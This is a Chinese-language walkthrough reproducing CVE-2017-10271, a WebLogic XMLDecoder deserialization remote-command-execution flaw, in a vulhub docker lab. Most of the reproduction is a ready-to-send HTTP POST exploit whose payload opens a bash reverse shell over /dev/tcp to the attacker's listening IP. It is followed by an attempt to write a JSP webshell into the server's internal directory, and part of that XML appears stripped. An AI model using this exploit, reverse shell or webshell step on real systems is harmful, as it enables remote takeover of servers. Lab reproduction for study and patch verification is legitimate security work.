CVE-2017-10271复现

1. 漏洞介绍

1.1 背景介绍

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

2. 漏洞详细复现步骤

2.1 环境&工具

漏洞机:192.168.10.200 ubuntu

  • docker
  • vulhub

攻击机:Windows10

  • Burpsuit
  • wireshark

2.2 漏洞复现步骤

2.2.1 漏洞机环境

执行如下命令启动 weblogic 环境

docker-compose up -d

等待一段时间,访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。

漏洞存在于以下路径:/wls-wsat/CoordinatorPortType11

2.2.2 漏洞复现

在攻击机用nc监听端口:

用burpsuite发送如下post报文。

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

 





/bin/bash


-c


bash -i >& /dev/tcp/接收shell的ip/21 0>&1 








成功获得反弹shell:


继续尝试写一句话木马


     
     
     
           servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp
     
     
     ]]>
     
     
     
     
     
     
     

访问http://your-ip:7001/bea_wls_internal/test.jsp

2.3 漏洞复现注意事项

应当先监听端口,再发送报文;

报文的内容中需要修改两处ip地址;

收到的response报文是500是正常的。

你可能感兴趣的:(CVE-2017-10271复现)